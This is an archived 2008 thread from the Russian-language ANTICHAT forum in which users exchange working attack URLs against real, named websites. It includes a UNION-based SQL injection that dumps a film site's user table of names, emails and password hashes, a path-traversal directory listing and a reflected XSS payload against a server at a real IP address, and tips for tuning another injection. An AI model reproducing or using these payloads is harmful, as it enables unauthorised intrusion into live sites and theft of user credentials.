ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.09.2008, 07:08
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Код:
http://www.mymovie.in.ua/find.php?param=filmtype&text=-1+union+select+version()/*
|
|
|
23.09.2008, 07:49
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715
Репутация:
659
|
|
Благодарю, krypt3r за помощь
Нашел таблицу юзеров:
Код:
http://www.mymovie.in.ua/find.php?param=filmtype&text=-1+union+select+concat(name,0x3a,email,0x3a,pass)+from+user/*
Жаль, алгоритм хеширования не из числа популярных |
|
|
|
23.09.2008, 08:28
|
|
Постоянный
Регистрация: 23.11.2007
Сообщений: 342
Провел на форуме:
1215706
Репутация:
310
|
|
MySQL_64bit
|
|
|
|
23.09.2008, 10:37
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
diehard, хэши - это хорошо =) Там, кстати, можно и без пароля зайти))
ЗЫ. Алгоритм хэширования - MySQL4 aka OLD_PASSWORD в пятом мускуле
|
|
|
|
24.09.2008, 03:59
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Помогите разобраться, вот нашёл такую вещь:
http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=nat
Подозрение вызывает /Service_Online.jsp, вроде как это локальный инклуд, или чтение файла хз, я в этом не эксперт, скажите тут можно что нибудь сделать, или это не уязвимость?
|
|
|
|
24.09.2008, 04:10
|
|
Новичок
Регистрация: 18.09.2008
Сообщений: 15
Провел на форуме:
400579
Репутация:
73
|
|
Сообщение от Nightmarе
Помогите разобраться, вот нашёл такую вещь:
http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=nat
Подозрение вызывает /Service_Online.jsp, вроде как это локальный инклуд, или чтение файла хз, я в этом не эксперт, скажите тут можно что нибудь сделать, или это не уязвимость?
Можно делать листинг путем команд в переменной
пример http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/../
|
|
|
|
24.09.2008, 04:15
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Во спасибо большое!
Но вообще я так понял ничё серьёзного???
Последний раз редактировалось Nightmarе; 24.09.2008 в 04:18..
|
|
|
|
24.09.2008, 04:21
|
|
Новичок
Регистрация: 18.09.2008
Сообщений: 15
Провел на форуме:
400579
Репутация:
73
|
|
Сообщение от Nightmarе
Во спасибо большое!
Но вообще я так понял ничё серьёзного???
в принципе да.
держи еще xss пассив =)
http://212.32.214.246:8080/for_ssr/CodyServlet?jsp=/Service_Online.jsp&Type=%3Cscript%3Ealert(%22111%2 2)%3C/script%3E
|
|
|
|
25.09.2008, 00:15
|
|
Новичок
Регистрация: 21.09.2008
Сообщений: 9
Провел на форуме:
69313
Репутация:
1
|
|
http://сайт/id=0+union+select+1/*
Выводит
(страница 0 union select 1/* из 1)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 16
Такая ошибка выходит постоянно, перебрал до http://сайт/id=0+union+select+1,...,35/*
Как можно заюзать эту ошибку?
Последний раз редактировалось IND1G0; 25.09.2008 в 00:35..
|
|
|
|
25.09.2008, 00:22
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036
Репутация:
1334
|
|
А почему у тебя id=0?? попробуй -1 или 99999.
|
|
|
|
|
|
|
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|
Похожие темы
Линейный вид
